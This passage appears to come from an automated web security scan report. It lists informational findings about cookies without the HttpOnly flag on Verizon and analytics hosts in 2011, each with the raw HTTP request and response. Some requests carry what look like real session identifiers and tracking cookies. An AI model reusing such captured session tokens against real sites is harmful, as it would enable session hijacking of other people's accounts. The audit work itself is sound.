Content-Length: 43
Date: Mon, 05 Sep 2011 22:15:21 GMT
Connection: close

GIF89a.............!.......,...........D..;

10.22. http://d.mediabrandsww.com/r/dd/id/L21rdC8zL2NpZC8xMDU5NDA0L3QvMg/qry/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.mediabrandsww.com
Path:   /r/dd/id/L21rdC8zL2NpZC8xMDU5NDA0L3QvMg/qry/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC8zL2NpZC8xMDU5NDA0L3QvMg/qry/ HTTP/1.1
Host: d.mediabrandsww.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2644337228958821130

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2644337228958821130; Domain=.mediabrandsww.com; Expires=Sat, 03-Mar-2012 22:18:33 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 05 Sep 2011 22:18:32 GMT

GIF89a.............!.......,...........D..;

10.23. http://developer.verizon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developer.verizon.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: developer.verizon.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; cq5ublish-cookie=sjpcq5web1

Response

HTTP/1.1 404 Not Found
Set-Cookie: cq5ublish-cookie=sjpcq5web1; path=/
Date: Mon, 05 Sep 2011 22:42:22 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 296
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<hr>
<
...[SNIP]...

10.24. http://developer.verizon.com/jsps/devCenters/Smart_Phone/Landing_Pages/AppendixICategoryDefinitions.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developer.verizon.com
Path:   /jsps/devCenters/Smart_Phone/Landing_Pages/AppendixICategoryDefinitions.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsps/devCenters/Smart_Phone/Landing_Pages/AppendixICategoryDefinitions.jsp HTTP/1.1
Host: developer.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=RVBlTuSuBePmiAKx7NyXCg&start=10&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 404 Not Found
Set-Cookie: cq5ublish-cookie=sjpcq5web1; path=/
Date: Mon, 05 Sep 2011 22:42:15 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 359
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /jsps/devCenters/Smart_Phone/Landing_Pages/AppendixIC
...[SNIP]...

10.25. http://download.verizon.net/surround/media/misc/images/vidplayer_black_530x272.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.verizon.net
Path:   /surround/media/misc/images/vidplayer_black_530x272.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /surround/media/misc/images/vidplayer_black_530x272.jpg HTTP/1.1
Host: download.verizon.net
Proxy-Connection: keep-alive
Referer: http://media.verizon.com/media/widgets/NewsCenter/flash/NewsCenterPlayer.swf?version=5&_rand=1315280536325
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=03; lob=webmail; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Content-Length: 11349
Content-Type: image/jpeg
Last-Modified: Wed, 08 Sep 2010 22:58:18 GMT
Accept-Ranges: bytes
ETag: "491cd453a94fcb1:600"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:42:16 GMT
Connection: close
Set-Cookie: AkaUTrackingID=D39DBB1D9AAFA74641702E55CE620E29; expires=Sat, 08-Sep-2018 22:42:16 GMT; path=/; domain=verizon.net
Set-Cookie: AkaSTrackingID=9D33249FECAD5AA85EEBAA50ED9C9B53; path=/; domain=verizon.net

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
...[SNIP]...

10.26. http://ehg-verizon.hitbox.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550928B8DM%3BDM56050737WD%3BDM560507E4AM&hec=1&vjs=HBX0250.11u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-verizon.hitbox.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBer^Xer@rQe@z%zrzCC"%X%QBer^Xez%X%QBer^Xe"%X%QBer^ir"%X%QBer^Xer@rQe@"%@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCri"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM580820OHACV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCr^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM5605079NESV6=V1rrrrr"rz%X%QBe%XBQrBrCBXz%zrzr"%X%QBe%XBQz%X%QBe%XBQ"%X%QBe%XBQ"%X%QBe%XBQrBrCBX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; DM560507I8NCV6=V1rrrrr"rz%X%QBe%%%Xrirr%rz%zrz%BC^"%X%QBe%%%Xz%X%QBe%%%X"%X%QBeBXeB"%X%QBe%%%Xrirr%r"QCz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XrzA6DTdT:kTHGIWaoF9; DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%Ce%"%X%QBer^Xez%X%QBer^Xe"%X%QBeBX^@"%X%QBer^Xer@rQe@"XQz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; WSS_GW=V1z%X%QBXC@CQ; CTG=1315262397; DM560905OCSMV6=V1rrrrr"rz%X%QBe%CQr%%r^iQz%zrz^C@"%X%QBe%CQrz%X%QBe%CQr"%X%QBeBX^@"%X%QBe%CQr%%r^iQ"@i@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6Q%zA6DTdT:kTHGIWaoF9

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:42:11 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrz%BBQ"%X%QBe%Xrez%X%QBe%Xre"%X%QBeBQX%"%X%QBe%XrerCrCri"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:11 GMT; max-age=31536000
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%Q^Q"%X%QBer^Xez%X%QBer^Xe"%X%QBeBQX%"%X%QBer^Xer@rQe@"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:11 GMT; max-age=31536000
Set-Cookie: DM56050737WDV6=V1rrrrr"rz%X%QBeBQXr@Cre%ez%zrz%"%X%QBeBQXrz%X%QBeBQXr"%X%QBeBQX%"%X%QBeBQXr@Cre%e"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6@%zA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:11 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:42:11 GMT; max-age=31536000
Set-Cookie: CTG=1315262531; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:42:11 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:42:12 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.27. http://ehg-verizon.hitbox.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550928B8DM%3BDM5605070DMB%3BDM560507E4AM&hec=1&vjs=HBX0250.11u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-verizon.hitbox.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBer^Xer@rQe@z%zrzCC"%X%QBer^Xez%X%QBer^Xe"%X%QBer^ir"%X%QBer^Xer@rQe@"%@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM580820OHACV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCr^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM5605079NESV6=V1rrrrr"rz%X%QBe%XBQrBrCBXz%zrzr"%X%QBe%XBQz%X%QBe%XBQ"%X%QBe%XBQ"%X%QBe%XBQrBrCBX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; DM560507I8NCV6=V1rrrrr"rz%X%QBe%%%Xrirr%rz%zrz%BC^"%X%QBe%%%Xz%X%QBe%%%X"%X%QBeBXeB"%X%QBe%%%Xrirr%r"QCz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XrzA6DTdT:kTHGIWaoF9; DM560905OCSMV6=V1rrrrr"rz%X%QBe%CQr%%r^iQz%zrz^C@"%X%QBe%CQrz%X%QBe%CQr"%X%QBeBX^@"%X%QBe%CQr%%r^iQ"@i@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6Q%zA6DTdT:kTHGIWaoF9; DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrz%BBC"%X%QBe%Xrez%X%QBe%Xre"%X%QBeBQXr"%X%QBe%XrerCrCri"%BBCz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM56050737WDV6=V1rrrrr"rz%X%QBeBQXr@Cre%ez%zrzr"%X%QBeBQXrz%X%QBeBQXr"%X%QBeBQXr"%X%QBeBQXr@Cre%e"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6@%zA6DTdT:kTHGIWaoF9; DM56050762VVV6=V1rrrrr"rz%X%QBeBQCCr^riB^z%zrzr"%X%QBeBQCCz%X%QBeBQCC"%X%QBeBQCC"%X%QBeBQCCr^riB^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6CzA6DTdT:kTHGIWaoF9; DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%eri"%X%QBer^Xez%X%QBer^Xe"%X%QBeBQCC"%X%QBer^Xer@rQe@"%Cz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; WSS_GW=V1z%X%QBXC@CQ; CTG=1315262544

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:42:55 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrz%Be^"%X%QBe%Xrez%X%QBe%Xre"%X%QBeBQ@Q"%X%QBe%XrerCrCri"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:55 GMT; max-age=31536000
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%eX^"%X%QBer^Xez%X%QBer^Xe"%X%QBeBQ@Q"%X%QBer^Xer@rQe@"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:55 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:42:55 GMT; max-age=31536000
Set-Cookie: CTG=1315262575; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:42:55 GMT; max-age=604800
Set-Cookie: DM5605070DMBV6=V1rrrrr"rz%X%QBeBQ@C^%r@Qez%zrz%"%X%QBeBQ@Cz%X%QBeBQ@C"%X%QBeBQ@Q"%X%QBeBQ@C^%r@Qe"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%%@zA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:55 GMT; max-age=31536000
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:42:56 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.28. http://ehg-verizon.hitbox.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550928B8DM%3BDM560507CPCF62EN3&cd=1&hv=6&n=/routing+page&con=&vcon=/vz/home/residential&tt=auto&ja=y&dt=22&zo=300&lm=1315278819000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&np=Win32&nc=Windows%20NT%206.1&vpc=HBX0200u&vjs=HBX0250.11u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos,name&ra=&rf=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pu=&pl=Mozilla%20Default%20Plug-in%3AGoogle%20Update%3AiTunes%20Application%20Detector%3AGoogle%20Earth%20Plugin%3AJava%28TM%29%20Platform%20SE%206%20U26%3AJava%20Deployment%20Toolkit%206.0.260.3%3ASilverlight%20Plug-In%3AMicrosoft%20Office%202010%3AMicrosoft%20Office%202010%3AWPI%20Detector%201.4%3AGoogle%20Updater%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3A&lv.id=vzw_home,vzw_home,res_home,res_home,bus_home,bus_home,corp_vz,corp_vzw,hp_res_footer_about_us,hp_res_footer_contact_us,hp_res_footer_store_locator,hp_res_footer_careers,hp_bus_footer_vzthinkfinity,hp_res_footer_sitemap,hp_res_footer_privacy_policy,hp_res_footer_terms_conditions,hp_res_footer_site_feedback,&lv.pos=,,,,,,,,,,,,,,,,,&hid=0.22088988668371046 HTTP/1.1
Host: ehg-verizon.hitbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_landing.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:13:40 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBeriBr%QrXeez%zrzr"%X%QBeriBrz%X%QBeriBr"%X%QBeriBr"%X%QBeriBr%QrXee"rz(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6iBzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWazOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:13:40 GMT; max-age=31536000
Set-Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBeriBr%QrXeez%zrzr"%X%QBeriBrz%X%QBeriBr"%X%QBeriBr"%X%QBeriBr%QrXee"rz(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6iBzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWazOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:13:40 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBeriBr; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:13:40 GMT; max-age=31536000
Set-Cookie: CTG=1315260820; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:13:40 GMT; max-age=604800
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:13:41 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.29. http://ehg-verizon.hitbox.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550928B8DM%3BDM560507E4AM%3BDM580820OHAC&hec=1&vjs=HBX0250.11u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-verizon.hitbox.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBer^Xer@rQe@z%zrzCC"%X%QBer^Xez%X%QBer^Xe"%X%QBer^ir"%X%QBer^Xer@rQe@"%@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%@^"%X%QBer^Xez%X%QBer^Xe"%X%QBe%%%Q"%X%QBer^Xer@rQe@"Bz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; WSS_GW=V1z%X%QBXC@CQ; DM560507I8NCV6=V1rrrrr"rz%X%QBe%%%Xrirr%rz%zrzB"%X%QBe%%%Xz%X%QBe%%%X"%X%QBe%%%Q"%X%QBe%%%Xrirr%r"Bz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XrzA6DTdT:kTHGIWaoF9; CTG=1315261115

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:21:46 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCri"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:21:46 GMT; max-age=31536000
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrzX@r"%X%QBer^Xez%X%QBer^Xe"%X%QBe%Xre"%X%QBer^Xer@rQe@"%^%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:21:46 GMT; max-age=31536000
Set-Cookie: DM580820OHACV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCr^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:21:46 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:21:46 GMT; max-age=31536000
Set-Cookie: CTG=1315261306; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:21:46 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:21:47 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.30. http://ehg-verizon.hitbox.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
